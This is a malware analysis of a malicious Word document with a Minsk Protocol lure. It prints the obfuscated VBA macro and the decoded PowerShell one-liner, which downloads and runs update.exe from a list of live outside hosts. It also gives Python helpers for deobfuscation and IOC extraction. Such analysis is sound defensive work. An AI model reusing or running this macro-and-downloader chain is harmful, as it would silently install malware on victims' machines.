https://analyze.intezer.com/analyses/1832abdc-0212-4f2b-97af-ec69af2e5a92/genetic-analysis

https://www.virustotal.com/gui/file/81c7eef54c852dd68050147f77f937933cbff1c22722617180ca386ef55918ab

SHA256:81c7eef54c852dd68050147f77f937933cbff1c22722617180ca386ef55918ab

Malicious Word document referencing the Minsk Protocol.

A Document_Open macro launches PowerShell, which walks a list of hard-coded hosts and downloads and runs a second-stage executable (update.exe) from any host that responds.

Process Tree

Uses WINWORD to open the file.

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" "C:\Users\<USER>\AppData\Local\Temp\<ANALYZED-FILE-NAME>.doc" /q

Spawns PowerShell with a base64-encoded command (-enc). The command line is not in the macro body itself; it is the text of UserForm1.TextBox1, which Document_Open reads and hands to WScript.Shell.Exec (see the VBA below).

WINWORD also spawns splwow64:

C:\Windows\splwow64.exe 12288

splwow64.exe is the print-driver host that 32-bit Office (Office14 here) starts on 64-bit Windows; it appears under benign documents as well and is not attributable to the macro.

Details from the file

Using oleid, VBA macros are found.


Next, run olevba against the file to dump the VBA project and view the macro code.

ThisDocument.cls

Private Sub Document_Open()
    ' Command line hidden in the form's text box (see the UserForm1/o stream below)
    dywcrdwlcikn = UserForm1.TextBox1.Text
    ' "575363726970742e5368" & "656c6c" hex-decodes to "WScript.Shell"
    Set dywcrdwlcikncfp = CreateObject(wfkdhzivnpjutwx("575363726970742e5368") & wfkdhzivnpjutwx("656c6c"))
    ' Executes the PowerShell command line read from the text box
    Set dcptzdqqwnzx = dywcrdwlcikncfp.Exec(dywcrdwlcikn)
End Sub

' Hex decoder: takes the input two characters at a time, converts each pair
' with Val("&H..") and appends the resulting character
Function wfkdhzivnpjutwx(ByVal ankevzfzj As String) As String
    Dim eolvlvdrsa As Long
    For eolvlvdrsa = 1 To Len(ankevzfzj) Step 2
        wfkdhzivnpjutwx = wfkdhzivnpjutwx & Chr$(Val("&H" & Mid$(ankevzfzj, eolvlvdrsa, 2)))
    Next eolvlvdrsa
End Function


575363726970742e5368 is a hex-encoded string, not XOR: wfkdhzivnpjutwx walks it two characters at a time and turns each pair into a character via Chr$(Val("&H" & pair)). CyberChef's From Hex recipe, or any hex decoder, recovers it directly.

Decoded together with the appended 656c6c, the two literals give WScript.Shell.
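The following is an added example, not code from the original analysis: a Python reimplementation of the macro's hex decoder that also rewrites every wfkdhzivnpjutwx("...") & wfkdhzivnpjutwx("...") chain in olevba output into its plaintext literal, which is the kind of table the page refers to later. The VBA text it runs on is a constructed copy of the Document_Open body shown above; the helper name and the sample are the only inputs it assumes.

```python
import re

# Name of the sample's hex-decode helper (from the olevba output above).
DECODER = "wfkdhzivnpjutwx"

# Constructed copy of the Document_Open body from the page, used as input.
VBA_SAMPLE = r'''
Private Sub Document_Open()
    dywcrdwlcikn = UserForm1.TextBox1.Text
    Set dywcrdwlcikncfp = CreateObject(wfkdhzivnpjutwx("575363726970742e5368") & wfkdhzivnpjutwx("656c6c"))
    Set dcptzdqqwnzx = dywcrdwlcikncfp.Exec(dywcrdwlcikn)
End Sub
'''


def vba_val_hex(pair: str) -> int:
    """VBA Val("&H" & pair): parses the leading hex digits, 0 if there are none."""
    m = re.match(r"[0-9A-Fa-f]+", pair)
    return int(m.group(0), 16) if m else 0


def vba_hex_decode(hexstr: str) -> str:
    """Reproduce wfkdhzivnpjutwx: two characters at a time, Chr$(Val("&H" & pair)) each."""
    return "".join(chr(vba_val_hex(hexstr[i:i + 2])) for i in range(0, len(hexstr), 2))


# One decoder call, and a chain of calls joined with VBA's & operator.
CALL_RE = re.compile(rf'{DECODER}\("([0-9A-Fa-f]*)"\)')
CHAIN_RE = re.compile(rf'{DECODER}\("[0-9A-Fa-f]*"\)(?:\s*&\s*{DECODER}\("[0-9A-Fa-f]*"\))*')


def resolve_chain(chain: str) -> str:
    """Decode every call in an & chain and join the pieces, as VBA does at run time."""
    return "".join(vba_hex_decode(h) for h in CALL_RE.findall(chain))


def deobfuscate(src: str):
    """Return (rewritten source, {obfuscated expression: plaintext}).
    Each decoder chain is replaced by a quoted VBA literal, so the cleaned
    source reads the way the macro would have before obfuscation."""
    table = {}

    def repl(m):
        plain = resolve_chain(m.group(0))
        table[m.group(0)] = plain
        return '"' + plain.replace('"', '""') + '"'

    return CHAIN_RE.sub(repl, src), table


if __name__ == "__main__":
    cleaned, found = deobfuscate(VBA_SAMPLE)
    for obf, plain in found.items():
        print(f"{obf}  ->  {plain!r}")
    print(cleaned)
```

Run it over the full olevba dump rather than the excerpt and the table it prints is the decoded-string table for the whole project; the rewritten source is what to read when checking for further stages of obfuscation.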

UserForm1.frm

Private Sub TextBox1_Change()

End Sub


The form code is empty; the command line is stored as the text of TextBox1, which olevba reports as a VBA form string in the UserForm1/o stream:

powershell.exe -w h -NonI -NoP -noL -enc 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

-w h hides the window, -NonI and -NoP skip interactive mode and profile scripts, -noL suppresses the banner, and -enc takes the command as base64 of its UTF-16LE encoding (decode it as UTF-16LE, not UTF-8, or every character comes out followed by a null).


Decoded output

$ErrorActionPreference='SilentlyContinue';@("https://web.sunvn.net","https://taisunwin.club","https://web.sunwinvn.vip","http://b29.bet","https://playgo88.fun","https://choigo88.us")|%{$http=[System.Net.WebRequest]::Create("$_/SoftwareUpdate.exe").GetResponse();if($http.ContentLength -ne -1){(New-Object System.Net.WebClient).DownloadFile("$_/update.exe","$env:temp\update.exe");Start-Process -Filepath "$env:temp\update.exe"};$http.close()}

The script silences all errors, then for each base URL requests $_/SoftwareUpdate.exe and, if the server answered with a Content-Length, downloads $_/update.exe to %TEMP% and starts it. Two points matter for indicators: the probe path and the download path differ, so both /SoftwareUpdate.exe and /update.exe belong in the IOC list for every host, and the loop has no break, so each host that responds produces its own download and execution.
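An added example, not part of the original analysis: a Python helper that does the -enc round trip (base64 of UTF-16LE) and then expands the host list in the decoded script against every "$_/..." path the loop body uses, so the IOC list covers both the probe and the download URL per host. The script text is a constructed copy of the decoded output above; the original base64 blob is not reproduced, so the example encodes the script itself to stand in for the -enc argument.

```python
import base64
import re
from urllib.parse import urlsplit

# Constructed copy of the decoded script shown above (the page's own
# PowerShell text); the real -enc blob is not reproduced here.
DECODED_SCRIPT = (
    "$ErrorActionPreference='SilentlyContinue';"
    '@("https://web.sunvn.net","https://taisunwin.club","https://web.sunwinvn.vip",'
    '"http://b29.bet","https://playgo88.fun","https://choigo88.us")|%{'
    '$http=[System.Net.WebRequest]::Create("$_/SoftwareUpdate.exe").GetResponse();'
    "if($http.ContentLength -ne -1){(New-Object System.Net.WebClient).DownloadFile("
    '"$_/update.exe","$env:temp\\update.exe");Start-Process -Filepath "$env:temp\\update.exe"};'
    "$http.close()}"
)


def encode_command(script: str) -> str:
    """Build what powershell -enc consumes: base64 of the UTF-16LE text, no BOM."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; decoding as UTF-8 instead yields 's.c.r.i.p.t.' garbage."""
    return base64.b64decode(blob).decode("utf-16-le")


ARRAY_RE = re.compile(r'@\(((?:"[^"]*"\s*,?\s*)+)\)')   # the @("...", "...") host list
PATH_RE = re.compile(r'"\$_(/[^"]+)"')                   # every "$_/<path>" used in the loop


def extract_download_urls(script: str) -> list:
    """Expand every base in the array against every path used inside the loop.
    This sample probes /SoftwareUpdate.exe but fetches /update.exe, so both
    paths are emitted for each host."""
    m = ARRAY_RE.search(script)
    bases = re.findall(r'"([^"]+)"', m.group(1)) if m else []
    paths = sorted(set(PATH_RE.findall(script)))
    return [base + path for base in bases for path in paths]


def defang(url: str) -> str:
    """hxxp:// and [.] in the host only, leaving the path readable."""
    p = urlsplit(url)
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}"


if __name__ == "__main__":
    blob = encode_command(DECODED_SCRIPT)          # stands in for the page's -enc argument
    script = decode_command(blob)
    for url in extract_download_urls(script):
        print(defang(url))
```

To use it on a live sample, paste the base64 from the form string into decode_command instead of encoding DECODED_SCRIPT; the regexes are deliberately tied to the @(...) array and "$_/..." idiom seen here and will need adjusting for a loader built differently.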

Table including decoded hex strings


IOCs

DNS Resolutions

kms8[.]msguides[.]com → 193[.]29[.]63[.]133

TCP Requests

193[.]29[.]63[.]133:1688

Port 1688 is the KMS activation port and kms8.msguides.com is a public KMS activation host, so this is most likely the analysis VM activating Office rather than behaviour of the document; treat it as environment noise, not an indicator for this sample.

URLs (from the decoded PowerShell; each host is probed at /SoftwareUpdate.exe and the payload is fetched from /update.exe)

  • web.sunvn[.]net
  • taisunwin[.]club
  • web.sunwinvn[.]vip
  • b29[.]bet
  • playgo88[.]fun
  • choigo88[.]us